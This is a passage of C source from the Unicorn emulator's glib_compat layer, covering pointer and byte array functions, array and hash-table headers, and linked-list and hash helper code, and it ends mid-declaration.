 * either via g_ptr_array_unref(), when g_ptr_array_free() is called with
 * @free_segment set to %TRUE or when removing elements.
 *
 * Returns: A new #GPtrArray
 *
 * Since: 2.22
 */
GPtrArray *g_ptr_array_new_with_free_func (GDestroyNotify element_free_func)
{
    GPtrArray *array;

    array = g_ptr_array_new ();
    g_ptr_array_set_free_func (array, element_free_func);

    return array;
}

/**
 * g_ptr_array_new_full:
 * @reserved_size: number of pointers preallocated
 * @element_free_func: (nullable): a function to free elements when
 *     @array is destroyed, or %NULL
 *
 * Creates a new #GPtrArray with @reserved_size pointers preallocated
 * and a reference count of 1. This avoids frequent reallocation, if
 * you are going to add many pointers to the array. Note however that
 * the size of the array is still 0. It also sets @element_free_func
 * for freeing each element when the array is destroyed either via
 * g_ptr_array_unref(), when g_ptr_array_free() is called with
 * @free_segment set to %TRUE or when removing elements.
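 *
 * A usage sketch; g_strdup() stands in for any allocator whose result
 * can be released with g_free():
 * |[<!-- language="C" -->
 * GPtrArray *names = g_ptr_array_new_full (16, g_free);
 * g_ptr_array_add (names, g_strdup ("unicorn"));
 * // removing elements invokes g_free() on each of them
 * g_ptr_array_remove_range (names, 0, names->len);
 * ]|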
* * Returns: A new #GPtrArray * * Since: 2.30 */ GPtrArray *g_ptr_array_new_full (guint reserved_size, GDestroyNotify element_free_func) { GPtrArray *array; array = g_ptr_array_sized_new (reserved_size); g_ptr_array_set_free_func (array, element_free_func); return array; } /** * g_ptr_array_set_free_func: * @array: A #GPtrArray * @element_free_func: (nullable): A function to free elements with * destroy @array or %NULL * * Sets a function for freeing each element when @array is destroyed * either via g_ptr_array_unref(), when g_ptr_array_free() is called * with @free_segment set to %TRUE or when removing elements. * * Since: 2.22 */ void g_ptr_array_set_free_func (GPtrArray *array, GDestroyNotify element_free_func) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (array); rarray->element_free_func = element_free_func; } static void g_ptr_array_maybe_expand (GRealPtrArray *array, guint len) { /* Detect potential overflow */ //if ((G_MAXUINT - array->len) < len) // g_error ("adding %u to array would overflow", len); if ((array->len + len) > array->alloc) { guint old_alloc = array->alloc; array->alloc = g_nearest_pow (array->len + len); array->alloc = MAX (array->alloc, MIN_ARRAY_SIZE); array->pdata = g_realloc (array->pdata, sizeof (gpointer) * array->alloc); if (g_mem_gc_friendly) for ( ; old_alloc < array->alloc; old_alloc++) array->pdata [old_alloc] = NULL; } } /** * g_ptr_array_set_size: * @array: a #GPtrArray * @length: the new length of the pointer array * * Sets the size of the array. When making the array larger, * newly-added elements will be set to %NULL. When making it smaller, * if @array has a non-%NULL #GDestroyNotify function then it will be * called for the removed elements. */ void g_ptr_array_set_size (GPtrArray *array, gint length) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint length_unsigned; g_return_if_fail (rarray); g_return_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL)); g_return_if_fail (length >= 0); length_unsigned = (guint) length; if (length_unsigned > rarray->len) { guint i; g_ptr_array_maybe_expand (rarray, (length_unsigned - rarray->len)); /* This is not * memset (array->pdata + array->len, 0, * sizeof (gpointer) * (length_unsigned - array->len)); * to make it really portable. Remember (void*)NULL needn't be * bitwise zero. It of course is silly not to use memset (..,0,..). 
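 * Hence the explicit NULL-assignment loop below instead of a memset().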
*/ for (i = rarray->len; i < length_unsigned; i++) rarray->pdata[i] = NULL; } else if (length_unsigned < rarray->len) g_ptr_array_remove_range (array, length_unsigned, rarray->len - length_unsigned); rarray->len = length_unsigned; } static gpointer ptr_array_remove_index (GPtrArray *array, guint index_, gboolean fast, gboolean free_element) { GRealPtrArray *rarray = (GRealPtrArray *) array; gpointer result; g_return_val_if_fail (rarray, NULL); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), NULL); g_return_val_if_fail (index_ < rarray->len, NULL); result = rarray->pdata[index_]; if (rarray->element_free_func != NULL && free_element) rarray->element_free_func (rarray->pdata[index_]); if (index_ != rarray->len - 1 && !fast) memmove (rarray->pdata + index_, rarray->pdata + index_ + 1, sizeof (gpointer) * (rarray->len - index_ - 1)); else if (index_ != rarray->len - 1) rarray->pdata[index_] = rarray->pdata[rarray->len - 1]; rarray->len -= 1; if (g_mem_gc_friendly) rarray->pdata[rarray->len] = NULL; return result; } /** * g_ptr_array_remove_index: * @array: a #GPtrArray * @index_: the index of the pointer to remove * * Removes the pointer at the given index from the pointer array. * The following elements are moved down one place. If @array has * a non-%NULL #GDestroyNotify function it is called for the removed * element. If so, the return value from this function will potentially point * to freed memory (depending on the #GDestroyNotify implementation). * * Returns: (nullable): the pointer which was removed */ gpointer g_ptr_array_remove_index (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, FALSE, TRUE); } /** * g_ptr_array_remove_index_fast: * @array: a #GPtrArray * @index_: the index of the pointer to remove * * Removes the pointer at the given index from the pointer array. * The last element in the array is used to fill in the space, so * this function does not preserve the order of the array. But it * is faster than g_ptr_array_remove_index(). If @array has a non-%NULL * #GDestroyNotify function it is called for the removed element. If so, the * return value from this function will potentially point to freed memory * (depending on the #GDestroyNotify implementation). * * Returns: (nullable): the pointer which was removed */ gpointer g_ptr_array_remove_index_fast (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, TRUE, TRUE); } /** * g_ptr_array_steal_index: * @array: a #GPtrArray * @index_: the index of the pointer to steal * * Removes the pointer at the given index from the pointer array. * The following elements are moved down one place. The #GDestroyNotify for * @array is *not* called on the removed element; ownership is transferred to * the caller of this function. * * Returns: (transfer full) (nullable): the pointer which was removed * Since: 2.58 */ gpointer g_ptr_array_steal_index (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, FALSE, FALSE); } /** * g_ptr_array_steal_index_fast: * @array: a #GPtrArray * @index_: the index of the pointer to steal * * Removes the pointer at the given index from the pointer array. * The last element in the array is used to fill in the space, so * this function does not preserve the order of the array. But it * is faster than g_ptr_array_steal_index(). The #GDestroyNotify for @array is * *not* called on the removed element; ownership is transferred to the caller * of this function. 
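 *
 * A sketch of the reordering (hypothetical contents):
 * |[<!-- language="C" -->
 * // array->pdata holds {a, b, c, d}
 * gpointer p = g_ptr_array_steal_index_fast (array, 1);
 * // p == b, and array->pdata now holds {a, d, c}
 * ]|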
* * Returns: (transfer full) (nullable): the pointer which was removed * Since: 2.58 */ gpointer g_ptr_array_steal_index_fast (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, TRUE, FALSE); } /** * g_ptr_array_remove_range: * @array: a @GPtrArray * @index_: the index of the first pointer to remove * @length: the number of pointers to remove * * Removes the given number of pointers starting at the given index * from a #GPtrArray. The following elements are moved to close the * gap. If @array has a non-%NULL #GDestroyNotify function it is * called for the removed elements. * * Returns: the @array * * Since: 2.4 */ GPtrArray* g_ptr_array_remove_range (GPtrArray *array, guint index_, guint length) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint n; g_return_val_if_fail (rarray != NULL, NULL); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), NULL); g_return_val_if_fail (index_ <= rarray->len, NULL); g_return_val_if_fail (index_ + length <= rarray->len, NULL); if (rarray->element_free_func != NULL) { for (n = index_; n < index_ + length; n++) rarray->element_free_func (rarray->pdata[n]); } if (index_ + length != rarray->len) { memmove (&rarray->pdata[index_], &rarray->pdata[index_ + length], (rarray->len - (index_ + length)) * sizeof (gpointer)); } rarray->len -= length; if (g_mem_gc_friendly) { guint i; for (i = 0; i < length; i++) rarray->pdata[rarray->len + i] = NULL; } return array; } /** * g_ptr_array_remove: * @array: a #GPtrArray * @data: the pointer to remove * * Removes the first occurrence of the given pointer from the pointer * array. The following elements are moved down one place. If @array * has a non-%NULL #GDestroyNotify function it is called for the * removed element. * * It returns %TRUE if the pointer was removed, or %FALSE if the * pointer was not found. * * Returns: %TRUE if the pointer is removed, %FALSE if the pointer * is not found in the array */ gboolean g_ptr_array_remove (GPtrArray *array, gpointer data) { guint i; g_return_val_if_fail (array, FALSE); g_return_val_if_fail (array->len == 0 || (array->len != 0 && array->pdata != NULL), FALSE); for (i = 0; i < array->len; i += 1) { if (array->pdata[i] == data) { g_ptr_array_remove_index (array, i); return TRUE; } } return FALSE; } /** * g_ptr_array_remove_fast: * @array: a #GPtrArray * @data: the pointer to remove * * Removes the first occurrence of the given pointer from the pointer * array. The last element in the array is used to fill in the space, * so this function does not preserve the order of the array. But it * is faster than g_ptr_array_remove(). If @array has a non-%NULL * #GDestroyNotify function it is called for the removed element. * * It returns %TRUE if the pointer was removed, or %FALSE if the * pointer was not found. * * Returns: %TRUE if the pointer was found in the array */ gboolean g_ptr_array_remove_fast (GPtrArray *array, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint i; g_return_val_if_fail (rarray, FALSE); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), FALSE); for (i = 0; i < rarray->len; i += 1) { if (rarray->pdata[i] == data) { g_ptr_array_remove_index_fast (array, i); return TRUE; } } return FALSE; } /** * g_ptr_array_add: * @array: a #GPtrArray * @data: the pointer to add * * Adds a pointer to the end of the pointer array. The array will grow * in size automatically if necessary. 
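 *
 * |[<!-- language="C" -->
 * GPtrArray *array = g_ptr_array_new ();
 * g_ptr_array_add (array, (gpointer) "one");
 * g_ptr_array_add (array, (gpointer) "two");
 * ]|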
*/ void g_ptr_array_add (GPtrArray *array, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (rarray); g_return_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL)); g_ptr_array_maybe_expand (rarray, 1); rarray->pdata[rarray->len++] = data; } /** * g_ptr_array_extend: * @array_to_extend: a #GPtrArray. * @array: (transfer none): a #GPtrArray to add to the end of @array_to_extend. * @func: (nullable): a copy function used to copy every element in the array * @user_data: user data passed to the copy function @func, or %NULL * * Adds all pointers of @array to the end of the array @array_to_extend. * The array will grow in size automatically if needed. @array_to_extend is * modified in-place. * * @func, as a #GCopyFunc, takes two arguments, the data to be copied * and a @user_data pointer. On common processor architectures, it's safe to * pass %NULL as @user_data if the copy function takes only one argument. You * may get compiler warnings from this though if compiling with GCC's * `-Wcast-function-type` warning. * * If @func is %NULL, then only the pointers (and not what they are * pointing to) are copied to the new #GPtrArray. * * Since: 2.62 **/ void g_ptr_array_extend (GPtrArray *array_to_extend, GPtrArray *array, GCopyFunc func, gpointer user_data) { GRealPtrArray *rarray_to_extend = (GRealPtrArray *) array_to_extend; gsize i; g_return_if_fail (array_to_extend != NULL); g_return_if_fail (array != NULL); g_ptr_array_maybe_expand (rarray_to_extend, array->len); if (func != NULL) { for (i = 0; i < array->len; i++) rarray_to_extend->pdata[i + rarray_to_extend->len] = func (array->pdata[i], user_data); } else if (array->len > 0) { memcpy (rarray_to_extend->pdata + rarray_to_extend->len, array->pdata, array->len * sizeof (*array->pdata)); } rarray_to_extend->len += array->len; } /** * g_ptr_array_insert: * @array: a #GPtrArray * @index_: the index to place the new element at, or -1 to append * @data: the pointer to add. * * Inserts an element into the pointer array at the given index. The * array will grow in size automatically if necessary. * * Since: 2.40 */ void g_ptr_array_insert (GPtrArray *array, gint index_, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (rarray); g_return_if_fail (index_ >= -1); g_return_if_fail (index_ <= (gint)rarray->len); g_ptr_array_maybe_expand (rarray, 1); if (index_ < 0) index_ = rarray->len; if ((guint) index_ < rarray->len) memmove (&(rarray->pdata[index_ + 1]), &(rarray->pdata[index_]), (rarray->len - index_) * sizeof (gpointer)); rarray->len++; rarray->pdata[index_] = data; } /** * g_ptr_array_foreach: * @array: a #GPtrArray * @func: the function to call for each array element * @user_data: user data to pass to the function * * Calls a function for each element of a #GPtrArray. @func must not * add elements to or remove elements from the array. * * Since: 2.4 */ void g_ptr_array_foreach (GPtrArray *array, GFunc func, gpointer user_data) { guint i; g_return_if_fail (array); for (i = 0; i < array->len; i++) (*func) (array->pdata[i], user_data); } /** * SECTION:arrays_byte * @title: Byte Arrays * @short_description: arrays of bytes * * #GByteArray is a mutable array of bytes based on #GArray, to provide arrays * of bytes which grow automatically as elements are added. * * To create a new #GByteArray use g_byte_array_new(). To add elements to a * #GByteArray, use g_byte_array_append(), and g_byte_array_prepend(). 
* * To set the size of a #GByteArray, use g_byte_array_set_size(). * * To free a #GByteArray, use g_byte_array_free(). * * An example for using a #GByteArray: * |[<!-- language="C" --> * GByteArray *gbarray; * gint i; * * gbarray = g_byte_array_new (); * for (i = 0; i < 10000; i++) * g_byte_array_append (gbarray, (guint8*) "abcd", 4); * * for (i = 0; i < 10000; i++) * { * g_assert (gbarray->data[4*i] == 'a'); * g_assert (gbarray->data[4*i+1] == 'b'); * g_assert (gbarray->data[4*i+2] == 'c'); * g_assert (gbarray->data[4*i+3] == 'd'); * } * * g_byte_array_free (gbarray, TRUE); * ]| * * See #GBytes if you are interested in an immutable object representing a * sequence of bytes. */ /** * GByteArray: * @data: a pointer to the element data. The data may be moved as * elements are added to the #GByteArray * @len: the number of elements in the #GByteArray * * Contains the public fields of a GByteArray. */ /** * g_byte_array_new: * * Creates a new #GByteArray with a reference count of 1. * * Returns: (transfer full): the new #GByteArray */ GByteArray *g_byte_array_new (void) { return (GByteArray *)g_array_sized_new (FALSE, FALSE, 1, 0); } /** * g_byte_array_sized_new: * @reserved_size: number of bytes preallocated * * Creates a new #GByteArray with @reserved_size bytes preallocated. * This avoids frequent reallocation, if you are going to add many * bytes to the array. Note however that the size of the array is still * 0. * * Returns: the new #GByteArray */ GByteArray* g_byte_array_sized_new (guint reserved_size) { return (GByteArray *)g_array_sized_new (FALSE, FALSE, 1, reserved_size); } /** * g_byte_array_free: * @array: a #GByteArray * @free_segment: if %TRUE the actual byte data is freed as well * * Frees the memory allocated by the #GByteArray. If @free_segment is * %TRUE it frees the actual byte data. If the reference count of * @array is greater than one, the #GByteArray wrapper is preserved but * the size of @array will be set to zero. * * Returns: the element data if @free_segment is %FALSE, otherwise * %NULL. The element data should be freed using g_free(). */ guint8* g_byte_array_free (GByteArray *array, gboolean free_segment) { return (guint8 *)g_array_free ((GArray *)array, free_segment); } /** * g_byte_array_append: * @array: a #GByteArray * @data: the byte data to be added * @len: the number of bytes to add * * Adds the given bytes to the end of the #GByteArray. * The array will grow in size automatically if necessary. * * Returns: the #GByteArray */ GByteArray* g_byte_array_append (GByteArray *array, const guint8 *data, guint len) { g_array_append_vals ((GArray *)array, (guint8 *)data, len); return array; } /** * g_byte_array_prepend: * @array: a #GByteArray * @data: the byte data to be added * @len: the number of bytes to add * * Adds the given data to the start of the #GByteArray. * The array will grow in size automatically if necessary. * * Returns: the #GByteArray */ GByteArray *g_byte_array_prepend (GByteArray *array, const guint8 *data, guint len) { g_array_prepend_vals ((GArray *)array, (guint8 *)data, len); return array; } /** * g_byte_array_set_size: * @array: a #GByteArray * @length: the new size of the #GByteArray * * Sets the size of the #GByteArray, expanding it if necessary. 
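 * Note that the underlying #GArray is created with @clear_ set to
 * %FALSE (see g_byte_array_new()), so bytes gained by growing the
 * array are not guaranteed to be zero-initialised.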
 *
 * Returns: the #GByteArray
 */
GByteArray *g_byte_array_set_size (GByteArray *array, guint length)
{
    g_array_set_size ((GArray *)array, length);

    return array;
}
unicorn-2.1.1/glib_compat/garray.h 0000664 0000000 0000000 00000006461 14675241067 0017131 0 ustar00 root root 0000000 0000000
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

#ifndef __G_ARRAY_H__
#define __G_ARRAY_H__

#include "gtypes.h"

typedef struct _GBytes GBytes;
typedef struct _GArray GArray;
typedef struct _GByteArray GByteArray;
typedef struct _GPtrArray GPtrArray;

struct _GArray {
    gchar *data;
    guint len;
};

struct _GByteArray {
    guint8 *data;
    guint len;
};

struct _GPtrArray {
    gpointer *pdata;
    guint len;
};

/* Resizable arrays. remove fills any cleared spot and shortens the
 * array, while preserving the order. remove_fast will distort the
 * order by moving the last element to the position of the removed.
 */

#define g_array_append_val(a,v) g_array_append_vals (a, &(v), 1)
#define g_array_index(a,t,i) (((t*) (void *) (a)->data) [(i)])

GArray* g_array_append_vals (GArray *array, gconstpointer data, guint len);
GArray* g_array_new (gboolean zero_terminated, gboolean clear_, guint element_size);
GArray* g_array_sized_new (gboolean zero_terminated, gboolean clear_, guint element_size, guint reserved_size);
gchar* g_array_free(GArray *array, gboolean free_segment);
GArray* g_array_set_size(GArray *array, guint length);
GArray* g_array_remove_range (GArray *farray, guint index_, guint length);
void g_ptr_array_set_free_func (GPtrArray *array, GDestroyNotify element_free_func);

/* Resizable pointer array. This interface is much less complicated
 * than the above. Add appends a pointer. Remove fills any cleared
 * spot and shortens the array. remove_fast will again distort order.
 */

#define g_ptr_array_index(array,index_) ((array)->pdata)[index_]

GPtrArray* g_ptr_array_new_with_free_func (GDestroyNotify element_free_func);
void g_ptr_array_add(GPtrArray *array, gpointer data);
GPtrArray* g_ptr_array_sized_new (guint reserved_size);
GPtrArray* g_ptr_array_remove_range (GPtrArray *array, guint index_, guint length);

/* Byte arrays, an array of guint8. Implemented as a GArray,
 * but type-safe.
 */

GByteArray* g_byte_array_sized_new(guint reserved_size);
guint8* g_byte_array_free(GByteArray *array, gboolean free_segment);
GByteArray* g_byte_array_append(GByteArray *array, const guint8 *data, guint len);
GByteArray* g_byte_array_set_size(GByteArray *array, guint length);

#endif /* __G_ARRAY_H__ */
unicorn-2.1.1/glib_compat/ghash.h 0000664 0000000 0000000 00000004740 14675241067 0016734 0 ustar00 root root 0000000 0000000
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

#ifndef __G_HASH_H__
#define __G_HASH_H__

#include "gtypes.h"

typedef struct _GHashTable GHashTable;

typedef gboolean (*GHRFunc) (gpointer key, gpointer value, gpointer user_data);

struct _GHashTableIter {
    /*< private >*/
    gpointer dummy1;
    gpointer dummy2;
    gpointer dummy3;
    int dummy4;
    gboolean dummy5;
    gpointer dummy6;
};

GHashTable* g_hash_table_new (GHashFunc hash_func, GEqualFunc key_equal_func);
GHashTable* g_hash_table_new_full (GHashFunc hash_func, GEqualFunc key_equal_func,
                                   GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func);
void g_hash_table_destroy (GHashTable *hash_table);
gboolean g_hash_table_insert (GHashTable *hash_table, gpointer key, gpointer value);
void g_hash_table_replace (GHashTable *hash_table, gpointer key, gpointer value);
gboolean g_hash_table_remove (GHashTable *hash_table, gconstpointer key);
void g_hash_table_remove_all (GHashTable *hash_table);
gpointer g_hash_table_lookup (GHashTable *hash_table, gconstpointer key);
void g_hash_table_foreach (GHashTable *hash_table, GHFunc func, gpointer user_data);
guint g_hash_table_size (GHashTable *hash_table);
GHashTable* g_hash_table_ref (GHashTable *hash_table);
void g_hash_table_unref (GHashTable *hash_table);

/* Hash Functions */
gboolean g_int_equal (gconstpointer v1, gconstpointer v2);
guint g_int_hash (gconstpointer v);

#endif /* __G_HASH_H__ */
unicorn-2.1.1/glib_compat/glib_compat.c 0000664 0000000 0000000 00000116140 14675241067 0020113 0 ustar00 root root 0000000 0000000
/*
glib_compat.c replacement functionality for glib code used in qemu
Copyright (C) 2016 Chris Eagle cseagle at gmail dot com

This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the Free
Software Foundation; either version 2 of the License, or (at your option)
any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.

You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

// Part of this code was lifted from glib-2.28.0.
// Glib license is available in COPYING_GLIB file in root directory.

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <limits.h>

#include "glib_compat.h"

#ifndef _WIN64
#define GPOINTER_TO_UINT(p) ((guint)(uintptr_t)(p))
#else
#define GPOINTER_TO_UINT(p) ((guint) (guint64) (p))
#endif

/* All functions below added to eliminate GLIB dependency */

/* hashing and equality functions */

// Hash functions lifted glib-2.28.0/glib/ghash.c

/**
 * g_direct_hash:
 * @v: a #gpointer key
 *
 * Converts a gpointer to a hash value.
 * It can be passed to g_hash_table_new() as the @hash_func parameter,
 * when using pointers as keys in a #GHashTable.
 *
 * Returns: a hash value corresponding to the key.
 */
static guint g_direct_hash (gconstpointer v)
{
    return GPOINTER_TO_UINT (v);
}

// g_str_hash() is lifted glib-2.28.0/glib/gstring.c
/**
 * g_str_hash:
 * @v: a string key
 *
 * Converts a string to a hash value.
 *
 * This function implements the widely used "djb" hash apparently posted
 * by Daniel Bernstein to comp.lang.c some time ago. The 32 bit
 * unsigned hash value starts at 5381 and for each byte 'c' in the
 * string, is updated: <literal>hash = hash * 33 + c</literal>. This
 * function uses the signed value of each byte.
 *
 * It can be passed to g_hash_table_new() as the @hash_func parameter,
 * when using strings as keys in a #GHashTable.
 *
 * Returns: a hash value corresponding to the key
 **/
guint g_str_hash (gconstpointer v)
{
    const signed char *p;
    guint32 h = 5381;

    for (p = v; *p != '\0'; p++)
        h = (h << 5) + h + *p;

    return h;
}

gboolean g_str_equal(gconstpointer v1, gconstpointer v2)
{
    return strcmp((const char*)v1, (const char*)v2) == 0;
}

// g_int_hash() is lifted from glib-2.28.0/glib/gutils.c
/**
 * g_int_hash:
 * @v: a pointer to a #gint key
 *
 * Converts a pointer to a #gint to a hash value.
 * It can be passed to g_hash_table_new() as the @hash_func parameter,
 * when using pointers to integers values as keys in a #GHashTable.
 *
 * Returns: a hash value corresponding to the key.
 */
guint g_int_hash (gconstpointer v)
{
    return *(const gint*) v;
}

gboolean g_int_equal(gconstpointer v1, gconstpointer v2)
{
    return *((const gint*)v1) == *((const gint*)v2);
}

/* Doubly-linked list */

GList *g_list_first(GList *list)
{
    if (list == NULL) return NULL;
    while (list->prev) list = list->prev;
    return list;
}

void g_list_foreach(GList *list, GFunc func, gpointer user_data)
{
    GList *lp;
    for (lp = list; lp; lp = lp->next) {
        (*func)(lp->data, user_data);
    }
}

void g_list_free(GList *list)
{
    GList *lp, *next, *prev = NULL;
    if (list) prev = list->prev;
    for (lp = list; lp; lp = next) {
        next = lp->next;
        free(lp);
    }
    for (lp = prev; lp; lp = prev) {
        prev = lp->prev;
        free(lp);
    }
}

GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare)
{
    GList *i, *last = NULL;
    GList *n = (GList*)g_malloc(sizeof(GList));
    n->data = data;
    if (list == NULL) {
        n->next = n->prev = NULL;
        return n;
    }
    for (i = list; i; last = i, i = i->next) {
        if ((*compare)(data, i->data) <= 0) {
            /* insert n immediately before i */
            n->prev = i->prev;
            n->next = i;
            i->prev = n;
            if (n->prev) {
                /* link the predecessor forward to n as well */
                n->prev->next = n;
                return list;
            }
            /* n is the new head */
            return n;
        }
    }
    /* no smaller-or-equal element found: append n after the tail */
    n->prev = last;
    n->next = NULL;
    last->next = n;
    return list;
}

GList *g_list_prepend(GList *list, gpointer data)
{
    GList *n = (GList*)g_malloc(sizeof(GList));

    n->next = list;
    n->prev = NULL;
    n->data = data;
    /* keep the backward link of the old head consistent */
    if (list)
        list->prev = n;
    return n;
}

GList *g_list_remove_link(GList *list, GList *llink)
{
    if (llink) {
        if (llink == list) list = list->next;
        if (llink->prev) llink->prev->next = llink->next;
        if (llink->next) llink->next->prev = llink->prev;
    }
    return list;
}

// code copied from glib/glist.c, version 2.28.0
static GList *g_list_sort_merge(GList *l1, GList *l2, GFunc compare_func, gpointer user_data)
{
    GList list, *l, *lprev;
    gint cmp;

    l = &list;
    lprev = NULL;

    while (l1 && l2) {
        cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data);

        if (cmp <= 0) {
            l->next = l1;
            l1 = l1->next;
        } else {
            l->next = l2;
            l2 = l2->next;
        }
        l = l->next;
        l->prev = lprev;
        lprev = l;
    }
    l->next = l1 ?
l1 : l2; l->next->prev = l; return list.next; } static GList *g_list_sort_real(GList *list, GFunc compare_func, gpointer user_data) { GList *l1, *l2; if (!list) return NULL; if (!list->next) return list; l1 = list; l2 = list->next; while ((l2 = l2->next) != NULL) { if ((l2 = l2->next) == NULL) break; l1 = l1->next; } l2 = l1->next; l1->next = NULL; return g_list_sort_merge (g_list_sort_real (list, compare_func, user_data), g_list_sort_real (l2, compare_func, user_data), compare_func, user_data); } /** * g_list_sort: * @list: a #GList * @compare_func: the comparison function used to sort the #GList. * This function is passed the data from 2 elements of the #GList * and should return 0 if they are equal, a negative value if the * first element comes before the second, or a positive value if * the first element comes after the second. * * Sorts a #GList using the given comparison function. * * Returns: the start of the sorted #GList */ /** * GCompareFunc: * @a: a value. * @b: a value to compare with. * @Returns: negative value if @a < @b; zero if @a = @b; positive * value if @a > @b. * * Specifies the type of a comparison function used to compare two * values. The function should return a negative integer if the first * value comes before the second, 0 if they are equal, or a positive * integer if the first value comes after the second. **/ GList *g_list_sort (GList *list, GCompareFunc compare_func) { return g_list_sort_real (list, (GFunc) compare_func, NULL); } /* END of g_list related functions */ /* Singly-linked list */ GSList *g_slist_append(GSList *list, gpointer data) { GSList *head = list; if (list) { while (list->next) list = list->next; list->next = (GSList*)g_malloc(sizeof(GSList)); list = list->next; } else { head = list = (GSList*)g_malloc(sizeof(GSList)); } list->data = data; list->next = NULL; return head; } void g_slist_foreach(GSList *list, GFunc func, gpointer user_data) { GSList *lp; for (lp = list; lp; lp = lp->next) { (*func)(lp->data, user_data); } } void g_slist_free(GSList *list) { GSList *lp, *next; for (lp = list; lp; lp = next) { next = lp->next; free(lp); } } GSList *g_slist_prepend(GSList *list, gpointer data) { GSList *head = (GSList*)g_malloc(sizeof(GSList)); head->next = list; head->data = data; return head; } static GSList *g_slist_sort_merge (GSList *l1, GSList *l2, GFunc compare_func, gpointer user_data) { GSList list, *l; gint cmp; l=&list; while (l1 && l2) { cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); if (cmp <= 0) { l=l->next=l1; l1=l1->next; } else { l=l->next=l2; l2=l2->next; } } l->next= l1 ? l1 : l2; return list.next; } static GSList *g_slist_sort_real (GSList *list, GFunc compare_func, gpointer user_data) { GSList *l1, *l2; if (!list) return NULL; if (!list->next) return list; l1 = list; l2 = list->next; while ((l2 = l2->next) != NULL) { if ((l2 = l2->next) == NULL) break; l1=l1->next; } l2 = l1->next; l1->next = NULL; return g_slist_sort_merge (g_slist_sort_real (list, compare_func, user_data), g_slist_sort_real (l2, compare_func, user_data), compare_func, user_data); } /** * g_slist_sort: * @list: a #GSList * @compare_func: the comparison function used to sort the #GSList. * This function is passed the data from 2 elements of the #GSList * and should return 0 if they are equal, a negative value if the * first element comes before the second, or a positive value if * the first element comes after the second. * * Sorts a #GSList using the given comparison function. 
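 *
 * For example, sorting a list of strings (sketch):
 * |[<!-- language="C" -->
 * static gint cmp_str (gconstpointer a, gconstpointer b)
 * {
 *     return strcmp ((const char *) a, (const char *) b);
 * }
 *
 * list = g_slist_sort (list, cmp_str);
 * ]|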
* * Returns: the start of the sorted #GSList */ GSList *g_slist_sort (GSList *list, GCompareFunc compare_func) { return g_slist_sort_real (list, (GFunc) compare_func, NULL); } /* END of g_slist related functions */ // Hash functions lifted glib-2.28.0/glib/ghash.c #define HASH_TABLE_MIN_SHIFT 3 /* 1 << 3 == 8 buckets */ typedef struct _GHashNode GHashNode; struct _GHashNode { gpointer key; gpointer value; /* If key_hash == 0, node is not in use * If key_hash == 1, node is a tombstone * If key_hash >= 2, node contains data */ guint key_hash; }; struct _GHashTable { gint size; gint mod; guint mask; gint nnodes; gint noccupied; /* nnodes + tombstones */ GHashNode *nodes; GHashFunc hash_func; GEqualFunc key_equal_func; volatile gint ref_count; GDestroyNotify key_destroy_func; GDestroyNotify value_destroy_func; }; /** * g_hash_table_destroy: * @hash_table: a #GHashTable. * * Destroys all keys and values in the #GHashTable and decrements its * reference count by 1. If keys and/or values are dynamically allocated, * you should either free them first or create the #GHashTable with destroy * notifiers using g_hash_table_new_full(). In the latter case the destroy * functions you supplied will be called on all keys and values during the * destruction phase. **/ void 